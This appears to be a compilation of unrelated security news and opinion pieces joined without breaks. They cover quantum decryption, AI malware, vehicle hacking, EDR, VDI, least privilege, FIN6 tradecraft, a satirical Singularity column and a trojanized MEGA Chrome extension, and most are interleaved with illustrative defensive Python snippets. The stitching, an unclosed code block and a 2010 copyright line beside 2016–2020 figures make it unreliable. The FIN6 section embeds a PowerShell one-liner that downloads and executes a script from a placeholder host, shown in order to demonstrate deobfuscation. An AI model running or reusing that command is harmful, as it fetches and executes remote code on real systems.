Technology has advanced at an astonishing rate in the last decade and the pace is only set to accelerate. Capabilities that seemed impossible only a short time ago will develop extremely quickly, aiding those who see them coming and hindering those who don’t.
Developments in smart technology will create new possibilities for organizations of all kinds – but they will also create opportunities for attackers and adversaries by reducing the effectiveness of existing controls. Previously well-protected information will become vulnerable.
Quantum Arms Race Undermines the Digital Economy
The emergence of quantum computing will herald a step change in processing power, shifting perceptions about what computers can achieve. However, the increase in performance will enable those who develop or acquire the technology to break current encryption standards. With a fundamental security mechanism rendered obsolete, information and transactions of all kinds will suddenly become vulnerable.
The next generation of computer technology – quantum computing – will be able to crack in mere hours or minutes encryption that would have taken traditional computers millions of years. As a consequence, a security mechanism that forms the bedrock of today’s digital economy will require a complete overhaul, potentially exposing organizations to millions in transformation costs and lost trade. However, the practical problems start now. In particular, various parties will pre-empt this new technology by harvesting gigantic pools of encrypted information today, to be decrypted once the technology becomes available.
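The scale of the exposure can be sketched with a back-of-envelope calculation. It is well established that Shor's algorithm breaks RSA, ECC and Diffie-Hellman outright, while Grover's search roughly halves the effective strength of symmetric keys. The sketch below encodes that rule of thumb; it is an illustrative approximation, not a precise quantum cost model.

```python
# Rule-of-thumb sketch of key strength against a quantum attacker.
# Shor's algorithm: polynomial-time recovery of RSA/ECC/DH private keys.
# Grover's algorithm: quadratic speedup against symmetric search.

def effective_quantum_bits(algorithm: str, classical_bits: int) -> int:
    """Return the rough effective security (in bits) against a quantum attacker."""
    if algorithm in ("rsa", "ecc", "dh"):
        return 0                      # broken outright by Shor's algorithm
    if algorithm in ("aes", "hash-preimage"):
        return classical_bits // 2    # halved by Grover's algorithm
    raise ValueError(f"unknown algorithm class: {algorithm}")

if __name__ == "__main__":
    print(effective_quantum_bits("aes", 256))   # 128: still comfortable
    print(effective_quantum_bits("rsa", 2048))  # 0: needs replacement
```

This is why "harvest now, decrypt later" works: RSA-protected traffic captured today drops to zero effective security the day a sufficiently large quantum computer exists.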
National intelligence organizations will lead the charge to be the first to get their hands on this technology. The sensitive information, communications, services, transactions and critical infrastructure of adversaries will all become an open book. The desire to be first across the line is certain to drive a digital arms race. Who will be the quantum winner? That remains unclear.
Some nation states will want to expand their horizons and use quantum computing as an offensive weapon to undermine the digital economies of their perceived enemies – as will others who can get early access to the technology. Organizations in both the public and private sectors will then be prime targets for a range of attackers. None will be safe, even those that believe their information is secure now.
Artificially Intelligent Malware Amplifies Attackers’ Capabilities
Attackers will also take advantage of breakthroughs in artificial intelligence (AI) to develop malware that can learn from its surrounding environment and adapt to discover new vulnerabilities. Such malware will surpass the performance of human hackers, compromising data – including mission-critical information assets – and causing financial, operational and reputational damage.
According to many futurists, AI will bring huge benefits to society, especially in areas such as research and healthcare. However, it will also be deployed in more damaging ways, one of which will be to build computer malware that can change both its form and purpose. Attackers will use this artificially intelligent malware to find new ways to access an organization’s network and disrupt its operations. Mission-critical information assets such as trade secrets, R&D plans and business strategies will be targets for compromise – all without detection.
As it is AI-based, this new form of malware will learn from its environment, analyzing applications and systems to discover and exploit new vulnerabilities in real time. It will be hard to distinguish what is safe from unauthorized access and what isn’t. Even information previously believed to be well protected will be open to compromise.
Conventional techniques used to identify and remove malware will quickly become ineffective. Instead, AI-based solutions will be needed to fight this new malware – leading to a race for supremacy between offensive and defensive AI. The eventual winners will be hard to spot for some considerable time.
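The defensive side of that race starts from a simple idea: baseline what normal looks like in an environment, then flag deviations. Real defensive AI is far richer, but the learn-from-environment loop can be illustrated with a minimal z-score detector over a single metric; the sample data and threshold here are invented for illustration.

```python
# Minimal sketch of behaviour-baselining: learn a statistical profile of
# normal activity, then flag observations that deviate sharply from it.
from statistics import mean, stdev

def build_baseline(samples):
    """Summarise observed normal behaviour as (mean, standard deviation)."""
    return mean(samples), stdev(samples)

def is_anomalous(value, baseline, threshold=3.0):
    """Flag values more than `threshold` standard deviations from the mean."""
    mu, sigma = baseline
    if sigma == 0:
        return value != mu
    return abs(value - mu) / sigma > threshold

if __name__ == "__main__":
    normal_dns_queries_per_min = [12, 15, 11, 14, 13, 12, 16, 14]
    baseline = build_baseline(normal_dns_queries_per_min)
    print(is_anomalous(13, baseline))   # typical load
    print(is_anomalous(400, baseline))  # burst worth investigating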
Attacks on Connected Vehicles Put the Brakes on Operations
While advanced computing power will be used to directly target information assets, the prevalence of computers in connected vehicles will create new physical threats. By hacking connected systems, including those that control the vehicle, attackers will cause accidents that threaten human life and disrupt supply chains – not to mention impacting the reputation and revenue of vehicle manufacturers.
Attackers will look to remotely hack a range of connected vehicles – cars, lorries, vessels and trains – taking advantage of vulnerabilities within on-board systems to take control of them, steal them, or disable vital safety features. All forms of vehicles will be exposed. The sheer scale of targets will be dramatic: for example, the number of connected cars manufactured globally is predicted by Gartner to grow from 12.4 million in 2016 to 61 million by 2020.
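One widely discussed mitigation for in-vehicle networks is authenticating frames so a remote attacker who reaches the bus cannot inject spoofed commands. The sketch below appends a truncated HMAC plus a freshness counter to a CAN-style payload; real designs (e.g. AUTOSAR SecOC) differ in detail, and the key, counter handling and tag length here are illustrative assumptions.

```python
# Sketch of CAN-style frame authentication with a truncated HMAC.
# Key provisioning and counter synchronisation are assumed, not shown.
import hmac
import hashlib

KEY = b"per-vehicle-secret-key"  # hypothetical provisioned secret
TAG_LEN = 4                       # CAN frames are tiny, so tags are truncated

def sign_frame(can_id: int, payload: bytes, counter: int) -> bytes:
    """Compute a short authentication tag over id + freshness counter + payload."""
    msg = can_id.to_bytes(4, "big") + counter.to_bytes(4, "big") + payload
    return hmac.new(KEY, msg, hashlib.sha256).digest()[:TAG_LEN]

def verify_frame(can_id: int, payload: bytes, counter: int, tag: bytes) -> bool:
    """Reject tampered or replayed frames in constant time."""
    return hmac.compare_digest(sign_frame(can_id, payload, counter), tag)

if __name__ == "__main__":
    tag = sign_frame(0x244, b"\x01\xff", counter=7)
    print(verify_frame(0x244, b"\x01\xff", 7, tag))  # True: authentic frame
    print(verify_frame(0x244, b"\x00\xff", 7, tag))  # False: tampered payload
```

The counter is what stops a recorded brake-release frame from being replayed later; without freshness, authentication alone is not enough.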
The effects will be felt by various people and organizations. Individuals who travel in connected vehicles, or are in the vicinity, will have their lives put at risk. Organizations with supply chains that rely on connected vehicles to transport goods or materials will face operational disruption. Vehicle manufacturers and their subcontractors will face reputational damage, and maintenance providers will come under pressure to perform immediate software and hardware updates.
Liability for incidents – including deliberate attacks – will be a particularly hot topic. Insurance companies will be forced to rethink their strategies to take into consideration claims over incidents involving connected vehicles; organizations will wish to consider themselves blameless but may be held liable; and vehicle manufacturers are likely to face complex class action legal battles should incidents begin to fall into recognizable patterns.
Preparation Must Begin Now
Information security professionals are facing increasingly complex threats—some new, others familiar but evolving. Their primary challenge remains unchanged: to help their organizations navigate mazes of uncertainty where, at any moment, they could turn a corner and encounter information security threats that inflict severe business impact.
In the face of mounting global threats, organizations must make methodical and extensive commitments to ensure that practical plans are in place to adapt to major changes in the near future. Employees at all levels of the organization will need to be involved, from board members to managers in non-technical roles.
The threats listed above could impact businesses operating in cyberspace at break-neck speeds, particularly as the use of the Internet and connected devices spreads. Many organizations will struggle to cope as the pace of change intensifies. These threats should stay on the radar of every organization, both small and large, even if they seem distant. The future arrives suddenly, especially when you aren’t prepared.
About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner. Copyright 2010 Respective Author at Infosec Island
Most chief information security officers have begun to shift their security posture toward gaining more visibility into the way attacks occur, and how their organizations become targets, admitting they can’t protect their infrastructure from all cyber threats 100 percent of the time. Increasingly, CISOs recognize that visibility must be relevant if they want to efficiently contain breaches and not waste precious time on a witch-hunt.
Prevention is not enough
A recent survey by security company Bitdefender shows that one in four CISOs in the US and Europe admit their company has suffered a breach in the past year. Failure to detect a breach quickly may lead to full infrastructure compromise, irreversible data loss, and financial repercussions. For some companies, the implications of a breach may be so severe that they would never recover.
This explains why companies have rapidly embraced active defense mechanisms, such as endpoint detection and response (EDR) tools, to get relevant, accurate reports of security operations and analytics. EDR solutions not only help CISOs protect their infrastructure against sophisticated cyber threats, facilitate early detection and gather intelligence, but also bring better visibility to stealthy attacks, enabling rapid containment.
Detection and response capabilities allow security teams to easily and immediately detect an attack and act to minimize the impact on the network, brand reputation and customers. Companies that use an EDR solution acknowledge that a cyberattack can occur at any time, and security platforms can only address 99 percent of threats. EDR tools focus on addressing the last one percent of threats, allowing for greater fidelity in incident investigations. However, even though stacking multiple solutions, including EDR, brings stronger security, CISOs still face trouble managing multiple platforms, chasing false alerts and providing adequate security resources while keeping costs down.
A truly effective EDR solution must drive security focus and enable the organization’s overall security strategy. Otherwise, visibility can be seriously impaired by the sheer volume of potentially non-critical security alerts. The point of EDR is to flag any potential security threat and help increase the overall security posture of an organization, without filtering out relevant security alerts. Without a proper EDR solution, increased visibility can backfire and cause alert fatigue, overburdening IT and security departments that are already stretched thin in terms of resources and manpower.
CISOs now place the need for faster detection and response capabilities as the second main driver for enhancing their company’s cybersecurity posture, ahead of increased productivity, which was the main driver selected in a 2016 survey conducted by Bitdefender.
Meaningful intelligence makes a world of difference
EDR tools that lack priority-based alert filtering mechanisms can slow the detection of and response to real threats, as they may send IT and security staff down fruitless investigation paths. EDR alerting should not be about the sheer number of triggered alerts, but about intelligent, reliable, and meaningful alerts with a high probability of pointing to a real threat.
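Priority-based filtering is, at heart, a scoring problem: weight each alert by severity and detection confidence, and surface only those above a triage threshold. The sketch below illustrates the idea; the field names, weights and threshold are invented for illustration and do not come from any specific EDR product.

```python
# Sketch of priority-based alert triage: score = severity weight x confidence,
# surface only alerts above the threshold, highest score first.

def triage(alerts, threshold=0.6):
    """Return (score, name) pairs for alerts worth a human analyst's time."""
    severity_weight = {"low": 0.2, "medium": 0.5, "high": 0.9}
    surfaced = []
    for alert in alerts:
        score = severity_weight[alert["severity"]] * alert["confidence"]
        if score >= threshold:
            surfaced.append((score, alert["name"]))
    return sorted(surfaced, reverse=True)

if __name__ == "__main__":
    alerts = [
        {"name": "macro spawned powershell", "severity": "high",   "confidence": 0.95},
        {"name": "rare parent process",      "severity": "medium", "confidence": 0.40},
        {"name": "credential dump pattern",  "severity": "high",   "confidence": 0.80},
    ]
    for score, name in triage(alerts):
        print(f"{score:.2f}  {name}")
```

Even this toy version shows the trade-off the article describes: the threshold that suppresses noise is the same dial that can silently drop a real, low-confidence detection.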
IT and security teams that are already overburdened may end up ignoring or disregarding what can feel like a never-ending tide of security alerts. Triggered alerts could take days, weeks, and even months before they’re addressed and investigated, meaning a lack of staff to review them could be just as detrimental as the lack of an EDR solution in terms of the time it takes to detect a breach.
The major benefit of meaningful EDR alerts is that accurate and actionable security alerts lead to fast detection and response, without overburdening IT or security staff with trivial notifications. Rapid detection of data breaches means incident response procedures can be immediately triggered to contain, mitigate, and prevent full-blown security incidents.
The true power of an effective security posture lies in a layered security defense, augmented by next generation detection and response tools that accurately catch and stop potential data breaches as they occur. Based on the data in this survey, it’s fair to say that organizations cannot afford the absence of the right security tools.
About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.
Many CISOs and security pros see Virtual Desktop Infrastructure (VDI) and other remote application solutions as security barriers. They think VDI isolates sensitive resources from the user's device, making it impossible for hackers to bust through. But that’s a dangerous myth. In reality, VDI is only a minor hurdle for cyber-criminals.
It doesn’t matter whether your business is using VDI so employees can access server-hosted desktops from thin clients or personal laptops, or giving third-parties “controlled” access to corporate assets, or allowing IT admins and other privileged users to use VDI servers as “jump hosts” for managing the enterprise crown jewels. Whatever the VDI use case, corporate assets are still exposed. Here’s why:
- Thin clients
An employee using a thin client to connect to a remote VDI desktop running Windows is no better off security-wise than any other Windows laptop user. The remote desktop is still exposed to a variety of standard attack vectors, including email, web, external media, user-installed applications, and many others.
- Unmanaged employee devices
In many companies, employees are allowed to connect to corporate VDI desktops from unmanaged devices such as personal laptops. But what happens when those end-user devices are already compromised? In these scenarios, the attacker first gains control over the user’s personal laptop. He then impersonates the user and interacts with the remote VDI desktop. This doesn’t require attacker sophistication. It’s as simple as installing commoditized, off-the-shelf remote control software on the user’s personal laptop, waiting for the user to authenticate, and then controlling the VDI session in the user’s name.
Some people think that by preventing clipboard operations between the user’s personal laptop and the remote VDI desktop, you can thwart attacks. But that doesn’t really work. Attackers can stealthily and instantly send an entire script via emulated keystrokes, and then launch the script on the remote VDI desktop. From there, the path to complete control of the VDI desktop is short. This kind of attack doesn’t require any zero-day vulnerability and can be executed by any determined attacker.
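Because emulated keystrokes arrive far faster than any human can type, one illustrative countermeasure is to flag sessions whose inter-keystroke intervals are implausibly short. This is a crude heuristic sketch, not a product feature of any VDI platform, and the 30 ms floor is an assumed value.

```python
# Heuristic sketch: detect keystroke bursts too fast to be human typing.
# Threshold and ratio are illustrative assumptions, not tuned values.

def looks_scripted(key_timestamps_ms, min_human_interval_ms=30):
    """Flag a keystroke stream if nearly all intervals are below a human floor."""
    if len(key_timestamps_ms) < 2:
        return False
    intervals = [b - a for a, b in zip(key_timestamps_ms, key_timestamps_ms[1:])]
    fast = sum(1 for i in intervals if i < min_human_interval_ms)
    return fast / len(intervals) > 0.9

if __name__ == "__main__":
    human = [0, 180, 420, 530, 760, 900]   # ragged, human-paced typing
    injected = list(range(0, 600, 5))      # 5 ms apart: emulated input
    print(looks_scripted(human))     # False
    print(looks_scripted(injected))  # True
```

A patient attacker can defeat this by pacing the injected keystrokes, which is the broader point of the section: such controls raise the bar slightly but do not isolate anything.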
- Third-party connections
Third-party vendors and contractors who use VDI to access your corporate resources make your business just as vulnerable as employees with unmanaged devices. As seen in the recent Target and Equifax breaches, cyber-criminals only need to infect one of the vendor’s machines. After that, they can gain control of sensitive resources via VDI. Two-factor authentication for VDI sessions doesn’t help mitigate this risk because the attacker, already present on the machine, simply waits for a successful authentication and then launches the attack.
- Privileged users
Some enterprises let their IT administrators connect to privileged management consoles via jump hosts or jump boxes hosted on VDI terminal servers. While jump hosts are often a healthy practice, problems begin when the device used to access the privileged host is a compromised personal device – which is often the case. The bad guys look for IT administrators and target them personally. Once they infect an IT administrator’s personal device, they can literally control the entire organization over VDI.
The VDI Isolation Problem
Why doesn’t VDI work for security? It all comes down to this: VDI is not an isolation solution. It does not isolate the remote sensitive resources from the device used to access them. If hackers control the end-user’s device, they control the VDI resources.
Anything short of a full isolation approach leaves you vulnerable. That’s why local or remote access of sensitive resources should never be mixed with any corporate or personal usage that is exposed to the outside world. This guidance is being recommended more and more by security vendors like Microsoft and financial industry institutions like SWIFT, which propose using a separate instance of an operating system (OS) for accessing sensitive resources, including those residing on VDI.
Isolation in Action
So what would this look like in practice? A new, hypervisor-based approach entails turning end-user devices into software-defined endpoints, in which each endpoint has multiple isolated VMs. This approach fully isolates access to sensitive resources, without limiting the user’s freedom or requiring multiple laptops or desktops.
Everything a user does runs in one of their endpoint’s VMs, including OSes and all applications. One OS can be used for personal, unlocked usage, and the other for accessing sensitive resources, either locally or via VDI. Attackers controlling the personal VM cannot see or control the sensitive VM. They’d have to break out of the VM to be able to breach the security of the system. This provides the assured protection businesses need and the high productivity users crave.
VDI on its own provides a false sense of security that is misleading at best and can be devastating to the business at worst. It’s paramount that enterprises realize this risk and take appropriate isolation measures to protect their business.
About the author: Tal is a passionate entrepreneur and veteran R&D leader with 15 years of experience in the cyber and IT domains. Tal started his official career in the Israeli Ministry of Defense, in which he pioneered multiple mission-critical cyber products. He then joined the leadership team of Wanova – a desktop virtualization startup that was later acquired by VMware. He holds multiple US patents as well as an M.Sc. degree in Computer Science from the Technion.
When it comes to protecting data, removing admin rights is one of the most effective methods at an organisation’s disposal. Doing so minimises the likelihood that a successful attack on an individual’s account will be able to affect widespread system changes or install malware.
But many organisations still overlook the fact that restricting user admin rights represents just one cog in the data protection machine. Risks can never be completely removed but, by complementing the removal of admin rights with additional security measures, businesses can go a long way towards reducing the impact of any attacks.
More security means less privilege across the board
In 2017, our Microsoft Vulnerabilities Report showed that 80 per cent of all vulnerabilities in core applications, such as Word, Excel and PowerPoint, can be eliminated by restricting the number of individuals who hold admin rights within an organisation.
Although it is a strong starting point, organisations must view this as a platform to build their data security on, rather than a silver bullet to end all concerns around potential attacks. For example, a default setup of user accounts that hold the lowest possible level of privilege needed for staff to carry out their roles can bolster security by:
- Minimising the parameters of an attack: Attackers will only be able to access areas of a business related to that user's role, further reducing the type and amount of information they can access.
- Reducing the spread of malicious software: Should an account become compromised, embedded malware will only be able to disseminate across a small part of a network, again minimising an attacker’s impact.
- Reducing insider threat: Attacks can originate from inside an organisation through aggrieved employees. By creating an environment of least privilege, businesses can reduce these users’ access solely to the data and systems pertinent to their roles, again enhancing data protection.
- Increasing network stability: Unsolicited changes can be identified more quickly and easily when the scope of systems and files affected is reduced, giving organisations a timely advantage when it comes to resolving them.
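A least-privilege audit often starts with the simplest question: which processes or users are actually running elevated? The minimal cross-platform probe below is a sketch; a real audit would also enumerate group membership, token privileges and sudo rules.

```python
# Best-effort sketch: is the current process running with admin/root rights?
import os

def is_elevated() -> bool:
    """Return True if the current process appears to run elevated."""
    if hasattr(os, "geteuid"):            # POSIX: effective UID 0 means root
        return os.geteuid() == 0
    try:                                   # Windows: ask the shell API
        import ctypes
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except Exception:
        return False

if __name__ == "__main__":
    print("running elevated:", is_elevated())
```

Running a probe like this across a fleet quickly surfaces the accounts and services that quietly accumulated admin rights over the years, which are exactly the ones least-privilege programmes target first.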
The advantages of least privilege adoption are seen most prominently when an organisation suffers a successful assault on its systems. Attackers who breach the company’s outer defences will find that the level of access they are granted on the inside is significantly reduced – and being prepared for that situation before it happens is invaluable.
Layering your security with application control
To better defend themselves against malicious attacks, organisations should be actively introducing application control. This important additional layer of security ensures that unauthorised applications are unable to execute in a way that compromises the security of data.
This is managed through whitelisting and blacklisting all applications, ensuring administrators have full visibility and control over their IT systems. The advantages of application control include gaining the ability to:
- Monitor and adjust applications within a network: Provides a clear and complete picture of all active and inactive applications and systems.
- Prevent unauthorised execution: Only authorised applications can execute; any execution not approved on a whitelist is automatically blocked.
- Better understand data traffic: Companies operating application control can more easily monitor the flow of data within their systems, providing details on users’ access requirements and activities.
- Improve network stability: By limiting the extent to which changes can be made, administrators can promote greater stability and better mitigate adverse changes.
- Protect against known exploits: Exposure to vulnerabilities in unpatched operating systems and third-party applications can be reduced.
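At its core, whitelisting is a lookup: hash the binary about to execute and allow it only if the hash appears on an approved list. Production tools also check code signatures, publishers and paths; this sketch shows only the hash check.

```python
# Sketch of hash-based application allowlisting: a binary may run only if
# its SHA-256 digest is on the approved list.
import hashlib

def sha256_of(path: str) -> str:
    """Stream the file so large binaries don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def is_allowed(path: str, allowlist: set) -> bool:
    return sha256_of(path) in allowlist

if __name__ == "__main__":
    import os
    import tempfile
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"pretend this is an executable")
        binary = f.name
    allowlist = {sha256_of(binary)}
    print(is_allowed(binary, allowlist))  # True: approved binary
    os.unlink(binary)
```

The operational cost sits outside the code: every legitimate patch changes the hash, so the allowlist needs a maintained pipeline of its own.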
By controlling applications in this way, businesses gain greater control and visibility over how their systems interact with applications, and as a result over the transfer of data throughout the organisation, reducing their vulnerability to attacks.
Those that are committed to developing stronger safeguards against cyber threats shouldn’t rely on just one method to keep their data safe. Instead, they should proactively combine methods to bolster the security setup of their business and reduce the risk of damaging data breaches as a result.
About the author: Andrew has been a fundamental part of the Avecto story since its inception in 2008. As COO, Andrew is responsible for Avecto's end-to-end customer journey, leading the global consultancy divisions of pre-sales, post sales and training, as well as customer success, support and IT.
A cybercriminal group focused on stealing payment card data records has been using new tactics, techniques and procedures (TTPs) in attacks observed in 2017 and 2018, IBM X-Force security researchers report.
First detailed in April 2016, the group was initially observed in 2015, when it was compromising the point-of-sale (PoS) systems of organizations in the retail and hospitality sectors. At the time, FireEye determined that the hackers possessed valid credentials for each of the targeted companies’ networks.
In a new report detailing the group’s whereabouts, IBM reveals that recently seen FIN6 attacks combine previously known TTPs with new ones, such as the abuse of IT management software for malware deployment or the use of Windows Management Instrumentation Command (WMIC) for the automation of PowerShell command and script remote execution.
The cybercriminal group was observed deploying FrameworkPOS via an enterprise software deployment application and employing Metasploit-like behaviour, such as randomly generating service names in Windows event logs, dynamically generating file names for binaries on disk and hostnames in event logs.
The hackers would also inject malicious Meterpreter code into legitimate Windows processes, use PowerShell commands obfuscated using base64 encoding and gzip compression, and exclude specific processes from targeting.
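Defenders analysing such samples routinely have to reverse the base64 + gzip wrapping to see the underlying script. The sketch below shows both directions of that transformation; the embedded command is fabricated for illustration and is not a real FIN6 payload.

```python
# Sketch: decoding a base64 + gzip obfuscated PowerShell payload for analysis.
import base64
import gzip

def obfuscate(script: str) -> str:
    """How such a payload is typically built: gzip, then base64-encode."""
    return base64.b64encode(gzip.compress(script.encode("utf-8"))).decode()

def deobfuscate(blob_b64: str) -> str:
    """Reverse the wrapping to recover the plaintext script."""
    return gzip.decompress(base64.b64decode(blob_b64)).decode("utf-8")

if __name__ == "__main__":
    # Hypothetical downloader one-liner, for illustration only.
    payload = obfuscate("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')")
    print(deobfuscate(payload))
```

As IBM notes, the encoding buys the attackers stealth against naive string matching, not against an analyst: the transformation is trivially reversible once recognised.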
Other changes in the group’s techniques include the use of a new DLL filename for the FrameworkPOS malware, the use of a .dat file as a cover filename for the malicious PowerShell script that injects FrameworkPOS, the use of specific PowerShell parameters to avoid detection, and the use of “1.txt”, “services.txt” and “.csv” files as reconnaissance output names.
“While some of these TTPs may be side effects of tools FIN6 actors were using or specific to the environment in which the actors were operating, we believe many represent new TTPs that could become characteristic of evolved FIN6 standard operating procedures,” IBM says.
Despite the use of new techniques, the security researchers are confident that the attacks were performed by FIN6, due to the use of TTPs already associated with the group. In fact, they reveal that 90% of the tactics had been previously associated with the hackers.
The security researchers also warn that the hackers have demonstrated the ability “to gain systemic footholds in targeted networks, advance laterally and eventually achieve its objective of exfiltrating valuable data from the victim organization’s infrastructure.”
The group uses publicly available tools for reconnaissance and lateral movement, including FrameworkPOS, which allows it to harvest payment card data from POS endpoints’ memory. Not only are most of the group’s tools simplistic or publicly available, but their encoding mechanisms are relatively easy to decipher as well.
“FIN6’s skill lies in its ability to bypass security controls and employ stealthy techniques, which allows the group to steal large amounts of data and sell at least some of it for a profit in dark web markets,” IBM notes.
So I saw an ad for this project, “OpenWorm.” Seemed like it checked all the boxes that cause me to click a link:
Vaguely open source
Something to do with Legos
Has an app associated with it. “Get the App!”
And it’s for “real worm geeks!”
I consider myself a geek, and I’m real. Except, what the hell is the worm part? And even though I’m a real geek, I’m not a “worm geek.” Eeewww.
Turns out that the OpenWorm project is trying to digitally simulate the mind of one of Earth’s simplest creatures, the C. elegans nematode, a microscopic worm with only 302 neurons and 95 muscle cells. Researchers have scanned C. elegans and uploaded its neural map into a docker container or something, where you can troll it with various stimuli and model its reactions.
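This is nowhere near OpenWorm's actual model, but the flavour of "troll it with stimuli and watch it react" can be captured with a toy leaky integrate-and-fire neuron. All parameters below are arbitrary illustrative values.

```python
# Toy leaky integrate-and-fire neuron: membrane voltage leaks each step,
# integrates input current, and fires (then resets) when it crosses threshold.

def simulate(stimulus, threshold=1.0, leak=0.9):
    """Return the time steps at which the neuron fires for a given stimulus."""
    v, spikes = 0.0, []
    for t, current in enumerate(stimulus):
        v = v * leak + current
        if v >= threshold:
            spikes.append(t)
            v = 0.0
    return spikes

if __name__ == "__main__":
    gentle = [0.05] * 20   # weak poking: the worm-neuron ignores you
    rude = [0.5] * 20      # strong stimulus: it fires repeatedly
    print(simulate(gentle))  # []
    print(simulate(rude))
```

Scale that loop up to 302 interconnected neurons driving 95 muscle cells and you have, roughly, the problem OpenWorm is trying to solve.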
Its tiny brain is even smaller than those of many YouTube celebrities and can easily fit into an app on your phone.
The OpenWorm project reminds me of an upcoming event that’s going to solve all my aching-old-man problems: the Singularity. Popularized by futurist Ray Kurzweil, the Singularity is defined as the moment when human consciousness merges with, or is surpassed by, artificial intelligence. After that moment, history will be defined as “prior” and “after” the Singularity, because civilization will change radically.
There are two possible pathways to the Singularity. The optimistic route is that science will figure out how to scan a human mind and upload it into the cloud while preserving its consciousness. Once we’ve shuffled off this mortal coil, we’ll all be immortal. The OpenWorm project is a baby step toward that goal of immortality.
I’m already looking forward to picking out a sporty android body to carry my artificial intelligence around. Brand consultants at Tesla should be on this, because people are going to be self-conscious about what model of robot body they are rocking.
There’s a second, darker path to the Singularity. You’re eating your Wheaties and reading the paper in the morning and you tell your life partner, “Hey, babe, it says here that those ‘geniuses’ at Google created an artificial intelligence that achieved consciousness. And, yup, it’s already decided to exterminate the human race. Knew this would happen. Thanks, Obama.”
In this darker scenario, evil-looking male robots will be assigned to hunt and track human scum in the shelled-out underworld of Mountain View, California. It’s a trope we’re all so familiar with and no one will be surprised if it happens.
Stop and consider for a moment. What will the role of hackers be in the Singularity? It depends on how we get there.
Hackers in the Singularity
On the “light” path, where human minds migrate into computers, hacking will become the worst possible crime that anyone could commit. Hacking someone else’s mind could be tantamount to murder (or “real-death” in Altered Carbon lingo), or slavery. Hackers will be the equivalent of demons attacking your mind. Imagine you and your bestie are walking down Robson Street in your Tesla model XY robot sleeves, when suddenly your friend freezes and the words “ALL YOUR BASE ARE BELONG TO US” start scrolling across his face. “OMG, dude. You’re being hacked right now!” you exclaim, and you try to summon the Royal Canadian Mounted Cyber Police. But the only acknowledgement you receive is “IM IN UR BASE KILLING UR D00DZ,” and you realize you’re being hacked, too. Chilling, isn’t it?
On the “dark” path, Google Exterminator™ droids are using advanced data analytics to find the last pockets of human resistance to show them ads immediately prior to dispatching them. Hacking, in this world, will become humanity’s greatest hope, and hackers will be heroes. They will be freedom fighters like John Connor or Moses, and the black hoodie will be the symbol of resistance and liberation. Hackers will finally breach G Suite, perform lateral movements, and smash its defense grid.
Now, isn’t that interesting? On one path to the Singularity, hacking is the worst possible crime. But on the other path, hacking is humanity’s highest calling. Either way, the absolute value of hackers is going to be maximal. If you’re a young reader trying to choose a career, infosec should be an even more enticing option now that you’ve gamely read this whole article.
There’s an artificial intelligence conference in Australia that polls its attendees about when they think the Singularity will happen. Most recent guesses say 2040, though some predict it will come as early as 2020. Guys, that’s super close. The Texas Rangers, bless their hearts, have never won a World Series and may never get a chance to do so, because one assumes that, in the Singularity, all baseball games will be simulated inside silicon-based computers and have team names like the Dell Blades, the Intel Insides, or the Nippon Ham Fighters (oh, wait, that last one is already taken).
Since it’s looking like the Singularity will be a thing before I succumb to liver cirrhosis, I can probably stop contributing to my flaccid 401(k) retirement plan, because who’s going to need those in the Singularity?
A trojanized version of the MEGA extension was uploaded to the Google Chrome webstore earlier this week and was automatically pushed to users via the autoupdate mechanism.
Through this extension, users get direct access to the MEGA secure cloud storage service in their browser, for improved performance. Also available on Android, the extension is highly popular, with over 1.7 million downloads in the Chrome store (it is also available on MEGA’s website).
On September 4, the cloud storage service announced that an unknown attacker managed to upload a trojanized iteration of the extension (version 3.39.4) to the Google Chrome webstore. The malicious code would immediately be sent to users who had the autoupdate feature enabled.
Once installed, the rogue extension would ask users to allow it to read and change all the data on the websites they visit. Armed with the elevated permissions, the malicious application version would attempt to gather user credentials and send them to a server located in Ukraine, MEGA reveals.
The code targeted credentials for sites such as amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, and idex.market, as well as HTTP POST requests to other sites, but did not target mega.nz credentials.
According to MEGA, the rogue extension version was removed from the Chrome store and replaced with a legitimate iteration (version 3.39.5) four hours after the breach occurred. The clean variant was served to users through the autoupdate mechanism. Google removed the extension from the webstore five hours after the breach.
“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4,” MEGA says.
All users who might have visited sites that send plain-text credentials through POST requests (or used another extension that does so) while the trojanized extension was active likely had their credentials compromised, on those sites and/or applications.
The issue, MEGA says, is that Google disallows publisher signatures on Chrome extensions and relies instead on signing them automatically after upload to the Chrome webstore.
Thus, although the company uses “strict release procedures with multi-party code review, robust build workflow and cryptographic signatures where possible,” Google’s policy “removes an important barrier to external compromise.”
Both MEGAsync and the service’s Firefox extension, which are hosted by the company, are signed and “could therefore not have fallen victim to this attack vector,” MEGA claims. The mobile apps, which are hosted by Apple/Google/Microsoft, are also cryptographically signed, therefore immune as well.
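The difference between publisher-side signing and store-side signing can be sketched in a few lines. This is a hypothetical, dependency-free illustration, not MEGA's actual release pipeline: an HMAC stands in for the asymmetric signatures (e.g. RSA or Ed25519) real release signing uses, but the property shown is the same — an artifact signed with a key only the publisher holds fails verification after any post-upload tampering.

```python
import hashlib
import hmac

# Hypothetical publisher key: in practice this would be the private half of an
# asymmetric key pair that never leaves the publisher's build system.
PUBLISHER_KEY = b"publisher-secret-key"

def sign_release(artifact: bytes, key: bytes = PUBLISHER_KEY) -> str:
    """Produce a signature over the release artifact at build time."""
    return hmac.new(key, artifact, hashlib.sha256).hexdigest()

def verify_release(artifact: bytes, signature: str, key: bytes = PUBLISHER_KEY) -> bool:
    """Reject any artifact whose signature does not match the published one."""
    expected = hmac.new(key, artifact, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature)

clean = b"extension build v3.39.5"
sig = sign_release(clean)
assert verify_release(clean, sig)                                # legitimate build passes
assert not verify_release(b"extension build v3.39.4 (trojan)", sig)  # tampered build fails
```

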